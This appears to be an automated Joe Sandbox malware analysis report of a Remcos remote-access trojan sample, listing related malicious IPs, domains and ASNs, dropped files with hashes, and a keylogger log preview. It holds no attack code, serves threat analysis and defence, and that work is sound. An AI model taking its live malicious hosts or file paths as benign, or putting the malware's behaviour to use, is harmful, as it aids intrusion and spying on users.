                                                                                Start date and time:2024-12-08 08:41:06 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 9m 0s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:18
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:IB9876789000.bat.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/15@1/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 91%
                                                                                • Number of executed functions: 147
                                                                                • Number of non-executed functions: 313
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                • VT rate limit hit for: IB9876789000.bat.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                02:42:10API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                02:42:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                02:42:41API Interceptor6737374x Sleep call for process: wmplayer.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                192.210.150.26z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                                                                  FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                                                                    Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                                                                                      SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                                                                        FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                          178.237.33.501733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                          • geoplugin.net/json.gp
                                                                                          f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                          • www.geoplugin.net/json.gp?ip=

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          geoplugin.net1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 178.237.33.50
                                                                                          NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 178.237.33.50
                                                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AS-COLOCROSSINGUSmeerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                                          • 104.168.61.38
                                                                                          CGDL.docGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.172.208
                                                                                          seemejkiss.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                          • 107.175.113.196
                                                                                          seemybestdayguvenu.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                          • 172.245.123.29
                                                                                          k4PAIh16E6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 192.3.118.10
                                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 104.168.7.16
                                                                                          Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 192.3.243.136
                                                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 192.3.64.152
                                                                                          maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                          • 172.245.123.3
                                                                                          Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                          • 107.172.44.175
                                                                                          ATOM86-ASATOM86NL1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 178.237.33.50
                                                                                          NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 178.237.33.50
                                                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                          • 178.237.33.50

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IB9876789000.bat_b854b23560dba27c1cb7185199216bec2bfd1ca2_226d7daf_c2132685-611e-4aee-b972-67669eddeee5\Report.wer

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):65536
                                                                                          Entropy (8bit):1.2233160541443961
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:MHuZHa4dT6QMDc0UnU1aWB2WIt7YdzuiF9Z24lO8Qu:2L4dT1M7UnU1am2DYzuiF9Y4lO8Qu
                                                                                          MD5:BFE46A4DAAF9705F5FBF95C9314EC267
                                                                                          SHA1:3EFABB9BB4DCBD155113D90D313419BA5394E5B3
                                                                                          SHA-256:18DB1B0423D1A645971696038564E3E720250ADE4F20B672324B9B0F11AAA219
                                                                                          SHA-512:FF856307868429BDE77773571DF243FA56CC830FE8DE24331C34FE8A44C26F68DDDC1E56EA0481AF9CCD138D7C462BAD8AFA2673BBFF37B698919E7826BB855C
                                                                                          Malicious:false
                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.1.1.7.3.3.0.0.4.5.9.4.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.1.1.7.3.3.0.9.5.2.1.9.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.1.3.2.6.8.5.-.6.1.1.e.-.4.a.e.e.-.b.9.7.2.-.6.7.6.6.9.e.d.d.e.e.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.b.e.b.2.b.1.-.6.e.4.f.-.4.0.c.5.-.9.f.1.b.-.1.3.2.c.5.3.b.d.3.f.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.I.B.9.8.7.6.7.8.9.0.0.0...b.a.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.t.e.k.P.o.r.o.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.4.-.0.0.0.1.-.0.0.1.4.-.8.2.b.b.-.f.8.a.d.4.4.4.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.e.6.9.7.b.8.1.e.5.0.4.0.9.0.4.2.7.4.4.2.4.e.7.6.c.9.1.4.e.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.8.c.8.4.d.f.3.1.a.5.7.5.a.b.8.4.e.6.2.5.5.b.8.9.3.5.1.c.e.8.7.7.c.9.6.1.9.c.8.!.I.B.

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAFE.tmp.dmp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 16 streams, Sun Dec 8 07:42:10 2024, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):475542
                                                                                          Entropy (8bit):3.3193414031584094
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:Jh135T4M53iFt4RswwPxcSvKBbAMVukcfvH5Y5cD1CCqqlhFu/3+vyq0AA:71Jd5yFtnPhiAMncH5QcbqF3QB0A
                                                                                          MD5:CB671C8A310D60D893DB40E120E72E59
                                                                                          SHA1:6C747525AA7F1B433B4DB6F6EE7009D9A2508F4F
                                                                                          SHA-256:9659462D0EBE87808CD901D147120A3870C81F63F3E0A4623EE05F928C460213
                                                                                          SHA-512:FD5D01B3AD5136D4F13179166AC9D9E2F8CBE01734B6850B11CA4DAEBF3C76D552C24FC87CA9E8F57336E4ED68AA4F69F93BCD7CDBCC4F45323CF501F1A0658D
                                                                                          Malicious:false
                                                                                          Preview:MDMP..a..... ........MUg............D...............d.......$...4(.......!..X(.......Q..............l.......8...........T............<..............hI..........TK..............................................................................eJ.......K......Lw......................T............MUg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD21.tmp.WERInternalMetadata.xml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8820
                                                                                          Entropy (8bit):3.7093575070832547
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:R6l7wVeJsJNZP6YEItfCBrPgmfA74KApr789bFuVf+ui3m:R6lXJab6YECfAgmfU4K5FMf+Q
                                                                                          MD5:7631C9544A3FF3F50540C5E69BE4D49B
                                                                                          SHA1:76B82894BB4F53A604F75265B52C0406509AD206
                                                                                          SHA-256:5930BB80E643F08A5ABA7482C6E55080E4DF599A11D33D5DBB0A4855100886BD
                                                                                          SHA-512:EE41897D7FE2D393E3F6F476DA207073490E4E6C56A1F64BEC47EEA6964B001F21CCA15378962BA0EF8958E79FC58F909D46E997ACAD15118B2D67E94F2D45CA
                                                                                          Malicious:false
                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.2.0.<./.P.i.

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD61.tmp.xml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4788
                                                                                          Entropy (8bit):4.521495373238268
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwWl8zsk5Jg771I9J2WpW8VYyYm8M4JM+FMyyq85tTFi5j3d:uIjfkLI7mX7VKJuykFMj3d
                                                                                          MD5:722C9BE11F309AB95BEC832B9DDDBEA5
                                                                                          SHA1:78D2625D1020AA093867F92E062EF4BB65522CF0
                                                                                          SHA-256:30ADC98A3F4175DDDF674D8B1EB439BDA68A785732858FE54DC7BF24FC79203E
                                                                                          SHA-512:3C85D6D173C8B1AA36AA04AD686D2D6FA9590B17EB489E7F92EDD7DED0C741B0F04AC80BC5DE6D3AEEF2FC8C1F43633EEA87DC1A6D3DAD3A055B7870F4D5D03E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="622004" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                          C:\ProgramData\remcos\logs.dat

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):144
                                                                                          Entropy (8bit):3.3458058208756873
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:rhlKlyK1vfRlVdclCl55JWRal2Jl+7R0DAlBG45klovDl6v:6lZKlCb5YcIeeDAlOWAv
                                                                                          MD5:01BE92B44D022666BC7BE909E6770F18
                                                                                          SHA1:AF71062DF6D2CE8784D373A74A5DA4B722F75571
                                                                                          SHA-256:A3237E49EDF20A6FE8857B317892BEF15F6DF538DFE00E33A233D80C5E222B63
                                                                                          SHA-512:2378543E7AD6E6E8F282B9D16061BB11CA84880D95009D3A2B7542B7E7869B8D785F185507A2BA74686674046B28DEFB3B0C1AC96EFFA7EF26B6509868C24BBA
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                          Preview:....[.2.0.2.4./.1.2./.0.8. .0.2.:.4.2.:.0.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):963
                                                                                          Entropy (8bit):5.014904284428935
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                          Malicious:false
                                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllultnxj:NllU
                                                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u2u5nvc.hpi.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3o4asqo.zpo.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_la4dn2oz.lid.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vw4nikdb.iie.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\bhvCBB7.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x43d71b72, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):17301504
                                                                                          Entropy (8bit):0.8012013173000725
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:KdfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:IVQ4e81ySaKKjLrONseWe
                                                                                          MD5:52B2CAC6E3EB2C460304F0BC817F70C1
                                                                                          SHA1:318E016752BA38790CDC4DF2D779C915F3065962
                                                                                          SHA-256:E705E70A3ED6E754B076839DF39A188B65E14E7A9B56240C3E02DDA9949EFD3C
                                                                                          SHA-512:834D35572525BCEAAF0CF32C0B5040A0140730883E06174690345B02D4871AFAE348B1148089C3A67DA395C9274B1120F79472894514C29F016656055B32C5CD
                                                                                          Malicious:false
                                                                                          Preview:C..r... .......;!......E{ow("...{........................@.....8....{..7)...|g.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................&..7)...|g...................Q.7)...|g..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..

                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                          Category:dropped
                                                                                          Size (bytes):1835008
                                                                                          Entropy (8bit):4.421683353317405
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:rSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN80uhiTw:WvloTMW+EZMM6DFyC03w
                                                                                          MD5:669581FBCE1356D97EBF52ACF0F18EE1
                                                                                          SHA1:4CF0E71139207B18D246C07F3C86B5F2C126665F
